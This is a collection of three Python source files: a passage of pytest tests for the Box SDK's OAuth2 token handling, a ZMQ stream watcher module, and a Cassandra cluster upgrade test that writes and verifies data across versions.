with pytest.raises(BoxOAuthException):
mock_box_session.request.return_value = bad_network_response
oauth = OAuth2(
client_id='',
client_secret='',
access_token='fake_access_token',
session=mock_box_session,
)
token_method(oauth)
@pytest.mark.parametrize(
'token_method',
[OAuth2.refresh, OAuth2.authenticate],
indirect=True,
)
def test_token_request_raises_box_oauth_exception_when_no_json_object_can_be_decoded(
token_method,
mock_box_session,
non_json_response,
):
mock_box_session.request.return_value = non_json_response
oauth = OAuth2(
client_id='',
client_secret='',
access_token='fake_access_token',
session=mock_box_session,
)
with pytest.raises(BoxOAuthException):
token_method(oauth)
@pytest.fixture(params=[
['access_token'],
['refresh_token'],
[],
])
def network_response_with_missing_tokens(request):
mock_network_response = Mock(DefaultNetworkResponse)
mock_network_response.ok = True
json_dict = {}
for key in request.param:
json_dict[key] = 'fake_token'
mock_network_response.json.return_value = json_dict
return mock_network_response
@pytest.mark.parametrize('test_method', [
partial(OAuth2.refresh, access_token_to_refresh='fake_access_token'),
partial(OAuth2.authenticate, auth_code='fake_code')
])
def test_token_request_raises_box_oauth_exception_when_tokens_are_not_in_the_response(
test_method,
mock_box_session,
network_response_with_missing_tokens,
):
# pylint:disable=redefined-outer-name
mock_box_session.request.return_value = network_response_with_missing_tokens
oauth = OAuth2(
client_id='',
client_secret='',
access_token='fake_access_token',
session=mock_box_session,
)
with pytest.raises(BoxOAuthException):
test_method(oauth)
def test_token_request_allows_missing_refresh_token(mock_box_session):
mock_network_response = Mock()
mock_network_response.ok = True
mock_network_response.json.return_value = {'access_token': 'fake_token'}
mock_box_session.request.return_value = mock_network_response
oauth = OAuth2(
client_id='',
client_secret='',
access_token='fake_access_token',
session=mock_box_session,
)
oauth.send_token_request({}, access_token=None, expect_refresh_token=False)
@pytest.fixture()
def oauth(client_id, client_secret, access_token, refresh_token, mock_box_session):
return OAuth2(
client_id=client_id,
client_secret=client_secret,
access_token=access_token,
refresh_token=refresh_token,
session=mock_box_session,
)
@pytest.mark.parametrize(
'access_token,refresh_token,expected_token_to_revoke',
(
('fake_access_token', 'fake_refresh_token', 'fake_access_token'),
(None, 'fake_refresh_token', 'fake_refresh_token')
)
)
def test_revoke_sends_revoke_request(
client_id,
client_secret,
mock_box_session,
access_token,
oauth,
expected_token_to_revoke,
):
mock_network_response = Mock()
mock_network_response.ok = True
mock_box_session.request.return_value = mock_network_response
oauth.revoke()
mock_box_session.request.assert_called_once_with(
'POST',
'{0}/revoke'.format(API.OAUTH2_API_URL),
data={
'client_id': client_id,
'client_secret': client_secret,
'token': expected_token_to_revoke,
},
access_token=access_token,
)
assert oauth.access_token is None
def test_tokens_get_updated_after_noop_refresh(client_id, client_secret, access_token, new_access_token, refresh_token, mock_box_session):
"""`OAuth2` object should update its state with new tokens, after no-op refresh.
If the protected method `_get_tokens()` returns new tokens, refresh is
skipped, and those tokens are used.
This is a regression test for issue #128 [1]. We would return the new
tokens without updating the object state. Subsequent uses of the `OAuth2`
object would use the old tokens.
[1] <https://github.com/box/box-python-sdk/issues/128>
"""
new_refresh_token = uuid.uuid4().hex
new_tokens = (new_access_token, new_refresh_token)
class GetTokensOAuth2(OAuth2):
def _get_tokens(self):
"""Return a new set of tokens, without updating any state.
In order for the test to pass, the `OAuth2` object must be
correctly programmed to take this return value and use it to update
its state.
"""
return new_tokens
oauth = GetTokensOAuth2(
client_id=client_id,
client_secret=client_secret,
access_token=access_token,
refresh_token=refresh_token,
session=mock_box_session,
)
assert oauth.access_token == access_token
assert oauth.refresh(access_token) == new_tokens
assert oauth.access_token == new_access_token
def test_closed_is_false_after_init(client_id, client_secret, mock_box_session):
auth = OAuth2(client_id=client_id, client_secret=client_secret, session=mock_box_session)
assert auth.closed is False
def test_closed_is_true_after_close(client_id, client_secret, mock_box_session):
auth = OAuth2(client_id=client_id, client_secret=client_secret, session=mock_box_session)
auth.close()
assert auth.closed is True
def test_token_requests_fail_after_close(client_id, client_secret, mock_box_session):
auth = OAuth2(client_id=client_id, client_secret=client_secret, session=mock_box_session)
auth.close()
with pytest.raises(ValueError):
auth.refresh(auth.access_token)
@pytest.mark.parametrize('raise_exception', [False, True])
def test_context_manager_closes_auth_object(client_id, client_secret, mock_box_session, raise_exception):
auth = OAuth2(client_id=client_id, client_secret=client_secret, session=mock_box_session)
try:
with auth.closing():
if raise_exception:
raise MyError
except MyError:
pass
assert auth.closed is True
def test_context_manager_fails_after_close(client_id, client_secret, mock_box_session):
auth = OAuth2(client_id=client_id, client_secret=client_secret, session=mock_box_session)
with auth.closing():
pass
with pytest.raises(ValueError):
with auth.closing():
assert False
@pytest.mark.parametrize(('close_args', 'close_kwargs'), [((), {}), ((True,), {}), ((), dict(revoke=True))])
def test_revoke_on_close(client_id, client_secret, access_token, mock_box_session, close_args, close_kwargs):
auth = OAuth2(client_id=client_id, client_secret=client_secret, access_token=access_token, session=mock_box_session)
with patch.object(auth, 'revoke') as mock_revoke:
auth.close(*close_args, **close_kwargs)
mock_revoke.assert_called_once_with()
def test_auth_object_is_closed_even_if_revoke_fails(client_id, client_secret, access_token, mock_box_session):
auth = OAuth2(client_id=client_id, client_secret=client_secret, access_token=access_token, session=mock_box_session)
with patch.object(auth, 'revoke', side_effect=BoxOAuthException(status=500)):
with pytest.raises(BoxOAuthException):
auth.close(revoke=True)
assert auth.closed is True
@pytest.mark.parametrize(('close_args', 'close_kwargs'), [((False,), {}), ((), dict(revoke=False))])
def test_revoke_on_close_can_be_skipped(client_id, client_secret, access_token, mock_box_session, close_args, close_kwargs):
auth = OAuth2(client_id=client_id, client_secret=client_secret, access_token=access_token, session=mock_box_session)
with patch.object(auth, 'revoke') as mock_revoke:
auth.close(*close_args, **close_kwargs)
mock_revoke.assert_not_called()
@pytest.mark.parametrize(('raise_from_block', 'raise_from_close', 'expected_exception'), [
(MyError, None, MyError),
(None, BoxOAuthException(status=500), BoxOAuthException),
(MyError, BoxOAuthException(status=500), MyError),
])
@pytest.mark.parametrize('close_kwargs', [{}, dict(revoke=False), dict(revoke=True)])
def test_context_manager_reraises_first_exception_after_close(
client_id, client_secret, mock_box_session, close_kwargs, raise_from_block, raise_from_close, expected_exception,
):
auth = OAuth2(client_id=client_id, client_secret=client_secret, session=mock_box_session)
with patch.object(auth, 'close', side_effect=raise_from_close) as mock_close:
with pytest.raises(expected_exception):
with auth.closing(**close_kwargs):
if raise_from_block:
raise raise_from_block
mock_close.assert_called_once_with(**close_kwargs)
@pytest.mark.parametrize('close_kwargs', [{}, dict(revoke=False), dict(revoke=True)])
def test_context_manager_skips_revoke_on_base_exception(client_id, client_secret, mock_box_session, close_kwargs):
auth = OAuth2(client_id=client_id, client_secret=client_secret, session=mock_box_session)
with patch.object(auth, 'close') as mock_close:
with pytest.raises(MyBaseException):
with auth.closing(**close_kwargs):
raise MyBaseException
mock_close.assert_called_once_with(revoke=False)
|
watcher.py
|
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT license.
import uuid
from typing import Sequence
from .zmq_wrapper import ZmqWrapper
from .watcher_base import WatcherBase
from .lv_types import CliSrvReqTypes
from .lv_types import DefaultPorts, PublisherTopics, ServerMgmtMsg
from . import utils
import threading, time
class Watcher(WatcherBase):
def __init__(self, filename:str=None, port:int=0, srv_name:str=None):
super(Watcher, self).__init__()
self.port = port
self.filename = filename
# used to detect server restarts
self.srv_name = srv_name or str(uuid.uuid4())
# define vars in __init__
self._clisrv = None
self._zmq_stream_pub = None
self._file = None
self._th = None
self._open_devices()
def _open_devices(self):
if self.port is not None:
self._clisrv = ZmqWrapper.ClientServer(port=DefaultPorts.CliSrv+self.port,
is_server=True, callback=self._clisrv_callback)
# notify existing listeners of our ID
self._zmq_stream_pub = self._stream_factory.get_streams(stream_types=['tcp:'+str(self.port)], for_write=True)[0]
# ZMQ quirk: we must wait a bit after opening port and before sending message
# TODO: can we do better?
self._th = threading.Thread(target=self._send_server_start)
self._th.start()
def _send_server_start(self):
time.sleep(2)
self._zmq_stream_pub.write(ServerMgmtMsg(event_name=ServerMgmtMsg.EventServerStart,
event_args=self.srv_name), topic=PublisherTopics.ServerMgmt)
def devices_or_default(self, devices:Sequence[str])->Sequence[str]: # overriden
# TODO: this method is duplicated in Watcher and WatcherClient
# make sure TCP port is attached to tcp device
if devices is not None:
return ['tcp:' + str(self.port) if device=='tcp' else device for device in devices]
# if no devices specified then use our filename and tcp:port as default devices
devices = []
# first open file device because it may have older data
if self.filename is not None:
devices.append('file:' + self.filename)
if self.port is not None:
devices.append('tcp:' + str(self.port))
return devices
def close(self):
if not self.closed:
if self._clisrv is not None:
self._clisrv.close()
if self._zmq_stream_pub is not None:
self._zmq_stream_pub.close()
if self._file is not None:
self._file.close()
utils.debug_log("Watcher is closed", verbosity=1)
super(Watcher, self).close()
def _reset(self):
self._clisrv = None
self._zmq_stream_pub = None
self._file = None
self._th = None
utils.debug_log("Watcher reset", verbosity=1)
super(Watcher, self)._reset()
def _clisrv_callback(self, clisrv, clisrv_req): # pylint: disable=unused-argument
utils.debug_log("Received client request", clisrv_req.req_type)
# request = create stream
if clisrv_req.req_type == CliSrvReqTypes.create_stream:
stream_req = clisrv_req.req_data
self.create_stream(name=stream_req.stream_name, devices=stream_req.devices,
event_name=stream_req.event_name, expr=stream_req.expr, throttle=stream_req.throttle,
vis_args=stream_req.vis_args)
return None # ignore return as we can't send back stream obj
elif clisrv_req.req_type == CliSrvReqTypes.del_stream:
stream_name = clisrv_req.req_data
return self.del_stream(stream_name)
else:
raise ValueError('ClientServer Request Type {} is not recognized'.format(clisrv_req))
|
upgrade_through_versions_test.py
|
import operator
import os
import pprint
import random
import signal
import time
import uuid
import logging
import pytest
import psutil
from collections import defaultdict, namedtuple
from multiprocessing import Process, Queue
from queue import Empty, Full
from cassandra import ConsistencyLevel, WriteTimeout
from cassandra.query import SimpleStatement
from dtest import RUN_STATIC_UPGRADE_MATRIX, Tester
from tools.misc import generate_ssl_stores, new_node
from .upgrade_base import switch_jdks
from .upgrade_manifest import (build_upgrade_pairs,
current_2_1_x, current_2_2_x, current_3_0_x,
indev_3_11_x,
current_3_11_x, indev_trunk)
logger = logging.getLogger(__name__)
def data_writer(tester, to_verify_queue, verification_done_queue, rewrite_probability=0):
"""
Process for writing/rewriting data continuously.
Pushes to a queue to be consumed by data_checker.
Pulls from a queue of already-verified rows written by data_checker that it can overwrite.
Intended to be run using multiprocessing.
"""
# 'tester' is a cloned object so we shouldn't be inappropriately sharing anything with another process
session = tester.patient_cql_connection(tester.node1, keyspace="upgrade", protocol_version=tester.protocol_version)
prepared = session.prepare("UPDATE cf SET v=? WHERE k=?")
prepared.consistency_level = ConsistencyLevel.QUORUM
def handle_sigterm(signum, frame):
# need to close queue gracefully if possible, or the data_checker process
# can't seem to empty the queue and test failures result.
to_verify_queue.close()
exit(0)
signal.signal(signal.SIGTERM, handle_sigterm)
while True:
try:
key = None
if (rewrite_probability > 0) and (random.randint(0, 100) <= rewrite_probability):
try:
key = verification_done_queue.get_nowait()
except Empty:
# we wanted a re-write but the re-writable queue was empty. oh well.
pass
key = key or uuid.uuid4()
val = uuid.uuid4()
session.execute(prepared, (val, key))
to_verify_queue.put((key, val,))
except Exception:
logger.debug("Error in data writer process!")
to_verify_queue.close()
raise
def data_checker(tester, to_verify_queue, verification_done_queue):
"""
Process for checking data continuously.
Pulls from a queue written to by data_writer to know what to verify.
Pushes to a queue to tell data_writer what's been verified and could be a candidate for re-writing.
Intended to be run using multiprocessing.
"""
# 'tester' is a cloned object so we shouldn't be inappropriately sharing anything with another process
session = tester.patient_cql_connection(tester.node1, keyspace="upgrade", protocol_version=tester.protocol_version)
prepared = session.prepare("SELECT v FROM cf WHERE k=?")
prepared.consistency_level = ConsistencyLevel.QUORUM
def handle_sigterm(signum, frame):
# need to close queue gracefully if possible, or the data_checker process
# can't seem to empty the queue and test failures result.
verification_done_queue.close()
exit(0)
signal.signal(signal.SIGTERM, handle_sigterm)
while True:
try:
# here we could block, but if the writer process terminates early with an empty queue
# we would end up blocking indefinitely
(key, expected_val) = to_verify_queue.get_nowait()
actual_val = session.execute(prepared, (key,))[0][0]
except Empty:
time.sleep(0.1) # let's not eat CPU if the queue is empty
continue
except Exception:
logger.debug("Error in data verifier process!")
verification_done_queue.close()
raise
else:
try:
verification_done_queue.put_nowait(key)
except Full:
# the rewritable queue is full, not a big deal. drop this one.
# we keep the rewritable queue held to a modest max size
# and allow dropping some rewritables because we don't want to
# rewrite rows in the same sequence as originally written
pass
assert expected_val == actual_val, "Data did not match expected value!"
def counter_incrementer(tester, to_verify_queue, verification_done_queue, rewrite_probability=0):
"""
Process for incrementing counters continuously.
Pushes to a queue to be consumed by counter_checker.
Pulls from a queue of already-verified rows written by data_checker that it can increment again.
Intended to be run using multiprocessing.
"""
# 'tester' is a cloned object so we shouldn't be inappropriately sharing anything with another process
session = tester.patient_cql_connection(tester.node1, keyspace="upgrade", protocol_version=tester.protocol_version)
prepared = session.prepare("UPDATE countertable SET c = c + 1 WHERE k1=?")
prepared.consistency_level = ConsistencyLevel.QUORUM
def handle_sigterm(signum, frame):
# need to close queue gracefully if possible, or the data_checker process
# can't seem to empty the queue and test failures result.
to_verify_queue.close()
exit(0)
signal.signal(signal.SIGTERM, handle_sigterm)
while True:
try:
key = None
count = 0 # this will get set to actual last known count if we do a re-write
if (rewrite_probability > 0) and (random.randint(0, 100) <= rewrite_probability):
try:
key, count = verification_done_queue.get_nowait()
except Empty:
# we wanted a re-write but the re-writable queue was empty. oh well.
pass
key = key or uuid.uuid4()
session.execute(prepared, (key))
to_verify_queue.put_nowait((key, count + 1,))
except Exception:
logger.debug("Error in counter incrementer process!")
to_verify_queue.close()
raise
def counter_checker(tester, to_verify_queue, verification_done_queue):
"""
Process for checking counters continuously.
Pulls from a queue written to by counter_incrementer to know what to verify.
Pushes to a queue to tell counter_incrementer what's been verified and could be a candidate for incrementing again.
Intended to be run using multiprocessing.
"""
# 'tester' is a cloned object so we shouldn't be inappropriately sharing anything with another process
session = tester.patient_cql_connection(tester.node1, keyspace="upgrade", protocol_version=tester.protocol_version)
prepared = session.prepare("SELECT c FROM countertable WHERE k1=?")
prepared.consistency_level = ConsistencyLevel.QUORUM
def handle_sigterm(signum, frame):
# need to close queue gracefully if possible, or the data_checker process
# can't seem to empty the queue and test failures result.
verification_done_queue.close()
exit(0)
signal.signal(signal.SIGTERM, handle_sigterm)
while True:
try:
# here we could block, but if the writer process terminates early with an empty queue
# we would end up blocking indefinitely
(key, expected_count) = to_verify_queue.get_nowait()
actual_count = session.execute(prepared, (key,))[0][0]
except Empty:
time.sleep(0.1) # let's not eat CPU if the queue is empty
continue
except Exception:
logger.debug("Error in counter verifier process!")
verification_done_queue.close()
raise
else:
tester.assertEqual(expected_count, actual_count, "Data did not match expected value!")
try:
verification_done_queue.put_nowait((key, actual_count))
except Full:
# the rewritable queue is full, not a big deal. drop this one.
# we keep the rewritable queue held to a modest max size
# and allow dropping some rewritables because we don't want to
# rewrite rows in the same sequence as originally written
pass
@pytest.mark.upgrade_test
@pytest.mark.resource_intensive
@pytest.mark.skip("Fake skip so that this isn't run outside of a generated class that removes this annotation")
class TestUpgrade(Tester):
"""
Upgrades a 3-node Murmur3Partitioner cluster through versions specified in test_version_metas.
"""
test_version_metas = None # set on init to know which versions to use
subprocs = None # holds any subprocesses, for status checking and cleanup
extra_config = None # holds a non-mutable structure that can be cast as dict()
@pytest.fixture(autouse=True)
def fixture_add_additional_log_patterns(self, fixture_dtest_setup):
fixture_dtest_setup.ignore_log_patterns = (
# This one occurs if we do a non-rolling upgrade, the node
# it's trying to send the migration to hasn't started yet,
# and when it does, it gets replayed and everything is fine.
r'Can\'t send migration request: node.*is down',
r'RejectedExecutionException.*ThreadPoolExecutor has shut down',
# Occurs due to test/ccm writing topo on down nodes
r'Cannot update data center or rack from.*for live host',
# Normal occurance. See CASSANDRA-12026. Likely won't be needed after C* 4.0.
r'Unknown column cdc during deserialization',
)
def prepare(self):
logger.debug("Upgrade test beginning, setting CASSANDRA_VERSION to {}, and jdk to {}. (Prior values will be restored after test)."
.format(self.test_version_metas[0].version, self.test_version_metas[0].java_version))
cluster = self.cluster
cluster.set_install_dir(version=self.test_version_metas[0].version)
switch_jdks(self.test_version_metas[0].java_version)
self.fixture_dtest_setup.reinitialize_cluster_for_different_version()
logger.debug("Versions to test (%s): %s" % (type(self), str([v.version for v in self.test_version_metas])))
def init_config(self):
Tester.init_config(self)
if self.extra_config is not None:
logger.debug("Setting extra configuration options:\n{}".format(
pprint.pformat(dict(self.extra_config), indent=4))
)
self.cluster.set_configuration_options(
values=dict(self.extra_config)
)
def test_parallel_upgrade(self):
"""
Test upgrading cluster all at once (requires cluster downtime).
"""
self.upgrade_scenario()
@pytest.mark.timeout(3000)
def test_rolling_upgrade(self):
"""
Test rolling upgrade of the cluster, so we have mixed versions part way through.
"""
self.upgrade_scenario(rolling=True)
def test_parallel_upgrade_with_internode_ssl(self):
"""
Test upgrading cluster all at once (requires cluster downtime), with internode ssl.
"""
self.upgrade_scenario(internode_ssl=True)
@pytest.mark.timeout(3000)
def test_rolling_upgrade_with_internode_ssl(self):
"""
Rolling upgrade test using internode ssl.
"""
self.upgrade_scenario(rolling=True, internode_ssl=True)
def upgrade_scenario(self, populate=True, create_schema=True, rolling=False, after_upgrade_call=(), internode_ssl=False):
# Record the rows we write as we go:
if populate:
self.prepare()
self.row_values = set()
cluster = self.cluster
if cluster.version() >= '3.0':
cluster.set_configuration_options({'enable_user_defined_functions': 'true',
'enable_scripted_user_defined_functions': 'true'})
elif cluster.version() >= '2.2':
cluster.set_configuration_options({'enable_user_defined_functions': 'true'})
if internode_ssl:
logger.debug("***using internode ssl***")
generate_ssl_stores(self.fixture_dtest_setup.test_path)
self.cluster.enable_internode_ssl(self.fixture_dtest_setup.test_path)
if populate:
# Start with 3 node cluster
logger.debug('Creating cluster (%s)' % self.test_version_metas[0].version)
cluster.populate(3)
[node.start(use_jna=True, wait_for_binary_proto=True) for node in cluster.nodelist()]
else:
logger.debug("Skipping cluster creation (should already be built)")
# add nodes to self for convenience
for i, node in enumerate(cluster.nodelist(), 1):
node_name = 'node' + str(i)
setattr(self, node_name, node)
if create_schema:
if rolling:
self._create_schema_for_rolling()
else:
self._create_schema()
else:
logger.debug("Skipping schema creation (should already be built)")
time.sleep(5) # sigh...
self._log_current_ver(self.test_version_metas[0])
if rolling:
# start up processes to write and verify data
write_proc, verify_proc, verification_queue = self._start_continuous_write_and_verify(wait_for_rowcount=5000)
# upgrade through versions
for version_meta in self.test_version_metas[1:]:
if version_meta.family > '3.11' and internode_ssl:
seeds =[]
for seed in cluster.seeds:
seeds.append(seed.ip_addr + ':7001')
logger.debug("Forcing seeds to 7001 for internode ssl")
cluster.seeds = seeds
for num, node in enumerate(self.cluster.nodelist()):
# sleep (sigh) because driver needs extra time to keep up with topo and make quorum possible
# this is ok, because a real world upgrade would proceed much slower than this programmatic one
# additionally this should provide more time for timeouts and other issues to crop up as well, which we could
# possibly "speed past" in an overly fast upgrade test
time.sleep(60)
self.upgrade_to_version(version_meta, partial=True, nodes=(node,), internode_ssl=internode_ssl)
self._check_on_subprocs(self.fixture_dtest_setup.subprocs)
logger.debug('Successfully upgraded %d of %d nodes to %s' %
(num + 1, len(self.cluster.nodelist()), version_meta.version))
self.cluster.set_install_dir(version=version_meta.version)
self.fixture_dtest_setup.reinitialize_cluster_for_different_version()
# Stop write processes
write_proc.terminate()
# wait for the verification queue's to empty (and check all rows) before continuing
self._wait_until_queue_condition('writes pending verification', verification_queue, operator.le, 0, max_wait_s=1200)
self._check_on_subprocs([verify_proc]) # make sure the verification processes are running still
self._terminate_subprocs()
# not a rolling upgrade, do everything in parallel:
else:
# upgrade through versions
for version_meta in self.test_version_metas[1:]:
self._write_values()
self._increment_counters()
self.upgrade_to_version(version_meta, internode_ssl=internode_ssl)
self.cluster.set_install_dir(version=version_meta.version)
self.fixture_dtest_setup.reinitialize_cluster_for_different_version()
self._check_values()
self._check_counters()
self._check_select_count()
# run custom post-upgrade callables
for call in after_upgrade_call:
call()
logger.debug('All nodes successfully upgraded to %s' % version_meta.version)
self._log_current_ver(version_meta)
cluster.stop()
def tearDown(self):
# just to be super sure we get cleaned up
self._terminate_subprocs()
super(TestUpgrade, self).tearDown()
def _check_on_subprocs(self, subprocs):
"""
Check on given subprocesses.
If any are not alive, we'll go ahead and terminate any remaining alive subprocesses since this test is going to fail.
"""
subproc_statuses = [s.is_alive() for s in subprocs]
if not all(subproc_statuses):
message = "A subprocess has terminated early. Subprocess statuses: "
for s in subprocs:
message += "{name} (is_alive: {aliveness}), ".format(name=s.name, aliveness=s.is_alive())
message += "attempting to terminate remaining subprocesses now."
self._terminate_subprocs()
raise RuntimeError(message)
def _terminate_subprocs(self):
for s in self.fixture_dtest_setup.subprocs:
if s.is_alive():
try:
psutil.Process(s.pid).kill() # with fire damnit
except Exception:
logger.debug("Error terminating subprocess. There could be a lingering process.")
pass
def upgrade_to_version(self, version_meta, partial=False, nodes=None, internode_ssl=False):
"""
Upgrade Nodes - if *partial* is True, only upgrade those nodes
that are specified by *nodes*, otherwise ignore *nodes* specified
and upgrade all nodes.
"""
logger.debug('Upgrading {nodes} to {version}'.format(nodes=[n.name for n in nodes] if nodes is not None else 'all nodes', version=version_meta.version))
switch_jdks(version_meta.java_version)
logger.debug("JAVA_HOME: " + os.environ.get('JAVA_HOME'))
if not partial:
nodes = self.cluster.nodelist()
for node in nodes:
logger.debug('Shutting down node: ' + node.name)
node.drain()
node.watch_log_for("DRAINED")
node.stop(wait_other_notice=False)
for node in nodes:
node.set_install_dir(version=version_meta.version)
logger.debug("Set new cassandra dir for %s: %s" % (node.name, node.get_install_dir()))
if internode_ssl and (version_meta.family == 'trunk' or version_meta.family >= '4.0'):
node.set_configuration_options({'server_encryption_options': {'enabled': True, 'enable_legacy_ssl_storage_port': True}})
# hacky? yes. We could probably extend ccm to allow this publicly.
# the topology file needs to be written before any nodes are started
# otherwise they won't be grouped into dc's properly for multi-dc tests
self.cluster._Cluster__update_topology_files()
# Restart nodes on new version
for node in nodes:
logger.debug('Starting %s on new version (%s)' % (node.name, version_meta.version))
# Setup log4j / logback again (necessary moving from 2.0 -> 2.1):
node.set_log_level("INFO")
node.start(wait_other_notice=400, wait_for_binary_proto=True)
node.nodetool('upgradesstables -a')
def _log_current_ver(self, current_version_meta):
"""
Logs where we currently are in the upgrade path, surrounding the current branch/tag, like ***sometag***
"""
vers = [m.version for m in self.test_version_metas]
curr_index = vers.index(current_version_meta.version)
logger.debug(
"Current upgrade path: {}".format(
vers[:curr_index] + ['***' + current_version_meta.version + '***'] + vers[curr_index + 1:]))
def _create_schema_for_rolling(self):
"""
Slightly different schema variant for testing rolling upgrades with quorum reads/writes.
"""
session = self.patient_cql_connection(self.node2, protocol_version=self.protocol_version)
session.execute("CREATE KEYSPACE upgrade WITH replication = {'class':'SimpleStrategy', 'replication_factor':3};")
session.execute('use upgrade')
session.execute('CREATE TABLE cf ( k uuid PRIMARY KEY, v uuid )')
session.execute('CREATE INDEX vals ON cf (v)')
session.execute("""
CREATE TABLE countertable (
k1 uuid,
c counter,
PRIMARY KEY (k1)
);""")
def _create_schema(self):
session = self.patient_cql_connection(self.node2, protocol_version=self.protocol_version)
session.execute("CREATE KEYSPACE upgrade WITH replication = {'class':'SimpleStrategy', 'replication_factor':2};")
session.execute('use upgrade')
session.execute('CREATE TABLE cf ( k int PRIMARY KEY, v text )')
session.execute('CREATE INDEX vals ON cf (v)')
session.execute("""
CREATE TABLE countertable (
k1 text,
k2 int,
c counter,
PRIMARY KEY (k1, k2)
);""")
def _write_values(self, num=100):
session = self.patient_cql_connection(self.node2, protocol_version=self.protocol_version)
session.execute("use upgrade")
for i in range(num):
x = len(self.row_values) + 1
session.execute("UPDATE cf SET v='%d' WHERE k=%d" % (x, x))
self.row_values.add(x)
def _check_values(self, consistency_level=ConsistencyLevel.ALL):
for node in self.cluster.nodelist():
session = self.patient_cql_connection(node, protocol_version=self.protocol_version)
session.execute("use upgrade")
for x in self.row_values:
query = SimpleStatement("SELECT k,v FROM cf WHERE k=%d" % x, consistency_level=consistency_level)
result = session.execute(query)
k, v = result[0]
assert x == k
assert str(x) == v
def _wait_until_queue_condition(self, label, queue, opfunc, required_len, max_wait_s=600):
"""
Waits up to max_wait_s for queue size to return True when evaluated against a condition function from the operator module.
Label is just a string identifier for easier debugging.
On Mac OS X may not be able to check queue size, in which case it will not block.
If time runs out, raises RuntimeError.
"""
wait_end_time = time.time() + max_wait_s
while time.time() < wait_end_time:
try:
qsize = queue.qsize()
except NotImplementedError:
logger.debug("Queue size may not be checkable on Mac OS X. Test will continue without waiting.")
break
if opfunc(qsize, required_len):
logger.debug("{} queue size ({}) is '{}' to {}. Continuing.".format(label, qsize, opfunc.__name__, required_len))
break
if divmod(round(time.time()), 30)[1] == 0:
logger.debug("{} queue size is at {}, target is to reach '{}' {}".format(label, qsize, opfunc.__name__, required_len))
time.sleep(0.1)
continue
else:
raise RuntimeError("Ran out of time waiting for queue size ({}) to be '{}' to {}. Aborting.".format(qsize, opfunc.__name__, required_len))
def _start_continuous_write_and_verify(self, wait_for_rowcount=0, max_wait_s=600):
"""
Starts a writer process, a verifier process, a queue to track writes,
and a queue to track successful verifications (which are rewrite candidates).
wait_for_rowcount provides a number of rows to write before unblocking and continuing.
Returns the writer process, verifier process, and the to_verify_queue.
"""
# queue of writes to be verified
to_verify_queue = Queue(10000)
# queue of verified writes, which are update candidates
verification_done_queue = Queue(maxsize=500)
writer = Process(target=data_writer, args=(self, to_verify_queue, verification_done_queue, 25))
# daemon subprocesses are killed automagically when the parent process exits
writer.daemon = True
self.fixture_dtest_setup.subprocs.append(writer)
writer.start()
if wait_for_rowcount > 0:
self._wait_until_queue_condition('rows written (but not verified)', to_verify_queue, operator.ge, wait_for_rowcount, max_wait_s=max_wait_s)
verifier = Process(target=data_checker, args=(self, to_verify_queue, verification_done_queue))
# daemon subprocesses are killed automagically when the parent process exits
verifier.daemon = True
self.fixture_dtest_setup.subprocs.append(verifier)
verifier.start()
return writer, verifier, to_verify_queue
def _start_continuous_counter_increment_and_verify(self, wait_for_rowcount=0, max_wait_s=600):
"""
Starts a counter incrementer process, a verifier process, a queue to track writes,
and a queue to track successful verifications (which are re-increment candidates).
Returns the writer process, verifier process, and the to_verify_queue.
"""
# queue of writes to be verified
to_verify_queue = Queue()
# queue of verified writes, which are update candidates
verification_done_queue = Queue(maxsize=500)
incrementer = Process(target=data_writer, args=(self, to_verify_queue, verification_done_queue, 25))
# daemon subprocesses are killed automagically when the parent process exits
incrementer.daemon = True
self.fixture_dtest_setup.subprocs.append(incrementer)
incrementer.start()
if wait_for_rowcount > 0:
self._wait_until_queue_condition('counters incremented (but not verified)', to_verify_queue, operator.ge, wait_for_rowcount, max_wait_s=max_wait_s)
count_verifier = Process(target=data_checker, args=(self, to_verify_queue, verification_done_queue))
# daemon subprocesses are killed automagically when the parent process exits
count_verifier.daemon = True
self.fixture_dtest_setup.subprocs.append(count_verifier)
count_verifier.start()
return incrementer, count_verifier, to_verify_queue
def _increment_counters(self, opcount=25000):
logger.debug("performing {opcount} counter increments".format(opcount=opcount))
session = self.patient_cql_connection(self.node2, protocol_version=self.protocol_version)
session.execute("use upgrade;")
update_counter_query = ("UPDATE countertable SET c = c + 1 WHERE k1='{key1}' and k2={key2}")
self.expected_counts = {}
for i in range(10):
self.expected_counts[uuid.uuid4()] = defaultdict(int)
fail_count = 0
for i in range(opcount):
key1 = random.choice(list(self.expected_counts.keys()))
key2 = random.randint(1, 10)
try:
query = SimpleStatement(update_counter_query.format(key1=key1, key2=key2), consistency_level=ConsistencyLevel.ALL)
session.execute(query)
except WriteTimeout:
fail_count += 1
else:
self.expected_counts[key1][key2] += 1
if fail_count > 100:
break
assert fail_count < 100, "Too many counter increment failures"
def _check_counters(self):
logger.debug("Checking counter values...")
session = self.patient_cql_connection(self.node2, protocol_version=self.protocol_version)
session.execute("use upgrade;")
for key1 in list(self.expected_counts.keys()):
for key2 in list(self.expected_counts[key1].keys()):
expected_value = self.expected_counts[key1][key2]
query = SimpleStatement("SELECT c from countertable where k1='{key1}' and k2={key2};".format(key1=key1, key2=key2),
consistency_level=ConsistencyLevel.ONE)
results = session.execute(query)
if results is not None:
actual_value = results[0][0]
else:
# counter wasn't found
actual_value = None
assert actual_value == expected_value
def _check_select_count(self, consistency_level=ConsistencyLevel.ALL):
logger.debug("Checking SELECT COUNT(*)")
session = self.patient_cql_connection(self.node2, protocol_version=self.protocol_version)
session.execute("use upgrade;")
expected_num_rows = len(self.row_values)
countquery = SimpleStatement("SELECT COUNT(*) FROM cf;", consistency_level=consistency_level)
result = session.execute(countquery)
if result is not None:
actual_num_rows = result[0][0]
assert actual_num_rows == expected_num_rows, "SELECT COUNT(*) returned %s when expecting %s" % (actual_num_rows, expected_num_rows)
else:
self.fail("Count query did not return")
class BootstrapMixin(object):
"""
Can be mixed into UpgradeTester or a subclass thereof to add bootstrap tests.
Using this class is not currently feasible on lengthy upgrade paths, as each
version bump adds a node and this will eventually exhaust resources.
"""
def _bootstrap_new_node(self):
# Check we can bootstrap a new node on the upgraded cluster:
logger.debug("Adding a node to the cluster")
nnode = new_node(self.cluster, remote_debug_port=str(2000 + len(self.cluster.nodes)))
nnode.start(use_jna=True, wait_other_notice=240, wait_for_binary_proto=True)
self._write_values()
self._increment_counters()
self._check_values()
self._check_counters()
def _bootstrap_new_node_multidc(self):
# Check we can bootstrap a new node on the upgraded cluster:
logger.debug("Adding a node to the cluster")
nnode = new_node(self.cluster, remote_debug_port=str(2000 + len(self.cluster.nodes)), data_center='dc2')
